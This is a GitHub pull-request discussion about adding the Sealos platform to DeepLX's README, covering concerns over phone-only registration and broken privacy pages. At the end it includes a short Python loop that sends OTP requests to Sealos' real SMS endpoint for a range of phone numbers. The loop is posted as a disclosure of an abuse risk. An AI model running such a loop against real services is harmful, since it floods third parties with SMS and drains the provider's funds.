Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update README.md #79

Merged
merged 1 commit into from
Dec 25, 2023
Merged

Update README.md #79

merged 1 commit into from
Dec 25, 2023

Conversation

yangchuansheng
Copy link
Contributor

No description provided.

@missuo
Copy link
Member

missuo commented Dec 22, 2023

I found that sealos only supports registration with +86 phone numbers.

Sorry, I won't merge this PR because sealos is not a global platform.

@yangchuansheng
Copy link
Contributor Author

supports registration with

https://cloud.sealos.io supports registration with GitHub

@missuo
Copy link
Member

missuo commented Dec 25, 2023

supports registration with

https://cloud.sealos.io supports registration with GitHub

Its default registration method is a phone number, and I noticed that it does support the use of WeChat and GitHub, for which I don't think it's done globalized support, so I wouldn't recommend using this platform.

@missuo
Copy link
Member

missuo commented Dec 25, 2023

For what it's worth, the Service Agreement and Privacy Policy don't even load properly.

@fanux
Copy link

fanux commented Dec 25, 2023

Thank you very much for the suggestions. Cloud.sealos.io is running on GCP, and currently 80% of users are in China. We will improve based on these comments. Sealos is now in a production environment and can help users quickly start DeepLX. We plan to introduce DeepLX to China, serving hundreds of thousands of developers on the sealos platform.

We will continue to improve our global capabilities. Sealos is also an open-source project: https://github.com/labring/sealos

@missuo
Copy link
Member

missuo commented Dec 25, 2023

Thank you for your team's contribution, although I haven't used sealos, in my opinion this is a great idea, as I said you should treat users worldwide equally, for example, overseas users can only sign up through GitHub, which is obviously unreasonable and inconvenient.

Also you should emphasize on Service Agreement and Privacy Policy. I found that I get redirected to a third-party web domain and this site doesn't seem to be working properly.

I'm sure sealos will get better.

@missuo missuo merged commit c965f54 into OwO-Network:main Dec 25, 2023
@fanux
Copy link

fanux commented Dec 25, 2023

Year, we will add Google login first. There were some minor issues with the privacy policy and terms of service, which have been fixed. However, we haven't provided an English version yet. We will make improvements in the next couple of days. Thanks

@missuo
Copy link
Member

missuo commented Dec 25, 2023

Year, we will add Google login first. There were some minor issues with the privacy policy and terms of service, which have been fixed. However, we haven't provided an English version yet. We will make improvements in the next couple of days. Thanks

Thank you for listening to the voice of the customer.

@missuo
Copy link
Member

missuo commented Dec 25, 2023

The API for sending OTP seems to be prone to abuse. @yangchuansheng @fanux

import httpx

sms_api = 'https://cloud.sealos.io/api/auth/phone/sms'

headers = {
	"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
}

for phoneNumber in range(1000, 9999):
	phoneNumber = "1370571" + str(phoneNumber)
	data = {
		"phoneNumbers": phoneNumber
	}
	
	r = httpx.post(url = sms_api, headers = headers, data = data)
	print(r.text)

@fanux
Copy link

fanux commented Jan 9, 2024

Thanks~

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants